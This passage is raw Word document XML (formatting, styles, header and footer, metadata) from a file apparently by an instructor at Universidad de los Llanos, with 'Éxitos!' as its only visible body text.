          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRPr="00FE07EC" w:rsidRDefault="00E765B2">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRPr="00FE07EC" w:rsidRDefault="00E765B2">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRPr="00FE07EC" w:rsidRDefault="00E765B2">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00FF6D41">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Éxitos</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:sectPr w:rsidR="00E765B2">
      <w:headerReference w:type="default" r:id="rId11"/>
      <w:footerReference w:type="default" r:id="rId12"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="964" w:right="851" w:bottom="623" w:left="85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7A98" w:rsidRDefault="001B7A98">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="001B7A98" w:rsidRDefault="001B7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5B2" w:rsidRDefault="001B7A98">
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4419"/>
        <w:tab w:val="right" w:pos="8838"/>
      </w:tabs>
      <w:contextualSpacing w:val="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:hyperlink r:id="rId1">
      <w:r w:rsidR="00FF6D41">
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>felcorredor@unillanos.edu.co</w:t>
      </w:r>
    </w:hyperlink>
  </w:p>
  <w:p w:rsidR="00E765B2" w:rsidRDefault="00E765B2">
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4252"/>
        <w:tab w:val="right" w:pos="8504"/>
      </w:tabs>
      <w:contextualSpacing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7A98" w:rsidRDefault="001B7A98">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="001B7A98" w:rsidRDefault="001B7A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5B2" w:rsidRDefault="00FF6D41">
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4252"/>
        <w:tab w:val="right" w:pos="8504"/>
      </w:tabs>
      <w:contextualSpacing w:val="0"/>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      </w:rPr>
      <w:t xml:space="preserve">Felipe Andrés Corredor, </w:t>
    </w:r>
    <w:proofErr w:type="spellStart"/>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      </w:rPr>
      <w:t>M.Sc</w:t>
    </w:r>
    <w:proofErr w:type="spellEnd"/>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      </w:rPr>
      <w:t>.</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="es-ES" w:eastAsia="es-ES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margin">
            <wp:posOffset>3197860</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>0</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="295910" cy="251460"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:wrapSquare wrapText="bothSides" distT="0" distB="0" distL="0" distR="0"/>
          <wp:docPr id="3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95910" cy="251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E765B2" w:rsidRDefault="00FF6D41">
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4252"/>
        <w:tab w:val="right" w:pos="8504"/>
      </w:tabs>
      <w:contextualSpacing w:val="0"/>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:color w:val="000080"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>UNIVERSIDAD DE LOS LLANOS</w:t>
    </w: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margin">
            <wp:posOffset>76200</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>152400</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="6286500" cy="25400"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:wrapSquare wrapText="bothSides" distT="0" distB="0" distL="114300" distR="114300"/>
          <wp:docPr id="7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865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margin">
            <wp:posOffset>1092200</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>203200</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="5257800" cy="12700"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:wrapSquare wrapText="bothSides" distT="0" distB="0" distL="114300" distR="114300"/>
          <wp:docPr id="6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57800" cy="12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210B4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0CBA9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E035FE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F9ACBF9E"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="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vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2">
    <w:nsid w:val="29875DB1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="559CAD48"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter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vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3">
    <w:nsid w:val="39844974"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5B6A8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3A40402"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C8A639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CD92BD3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D66C6B8E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0" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6">
    <w:nsid w:val="6E8831BD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A5900A8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5B2"/>
    <w:rsid w:val="001B7A98"/>
    <w:rsid w:val="0036004E"/>
    <w:rsid w:val="003F52F1"/>
    <w:rsid w:val="004038AB"/>
    <w:rsid w:val="00464904"/>
    <w:rsid w:val="004F6D16"/>
    <w:rsid w:val="00864591"/>
    <w:rsid w:val="00CD7531"/>
    <w:rsid w:val="00E15683"/>
    <w:rsid w:val="00E765B2"/>
    <w:rsid w:val="00EB23E0"/>
    <w:rsid w:val="00FE07EC"/>
    <w:rsid w:val="00FF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61FFFCB-2A9B-457B-BEB6-60079BB92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s-CO" w:eastAsia="es-CO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outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr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outlineLvl w:val="5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rPr>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Subttulo">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22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felcorredor@unillanos.edu.co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2479</Words>
  <Characters>13636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Brayan Herrera</dc:creator>
  <cp:lastModifiedBy>Brayan Herrera</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-12-16T04:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-12-16T04:17:00Z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4443918f-2ef1-33f7-a49c-40c5824ccaeb</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="24" name="Mendeley Citation Style_1">
    <vt:lpwstr>http://www.zotero.org/styles/ieee</vt:lpwstr>
  </property>
</Properties>
</file>